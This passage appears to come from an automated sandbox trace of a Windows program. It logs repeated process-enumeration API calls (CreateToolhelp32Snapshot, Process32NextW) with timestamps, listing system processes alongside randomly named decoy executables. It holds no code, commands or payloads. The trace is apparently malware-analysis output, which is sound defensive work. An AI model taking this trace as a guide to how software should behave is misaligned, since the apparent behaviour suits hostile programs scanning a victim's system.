th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0113.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0113.947] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0113.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0113.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0113.952] CloseHandle (hObject=0xc4) returned 1 [0113.952] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0113.957] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.957] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.958] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.961] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0113.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0113.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0113.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0113.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0113.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0113.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0114.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0114.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0114.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0114.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0114.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0114.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0114.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0114.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0114.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0114.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0114.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0114.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0114.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0114.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0114.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0114.601] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0114.602] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0114.603] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0114.605] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0114.606] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0114.608] CloseHandle (hObject=0xbc) returned 1 [0114.608] Sleep (dwMilliseconds=0x12c) [0115.244] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0115.249] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0115.250] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0115.251] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0115.251] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0115.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0115.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0115.254] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0115.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0115.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0115.256] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.259] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.260] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0115.260] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.261] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.262] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0115.265] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.267] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.268] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0115.269] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0115.271] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0115.272] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.273] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 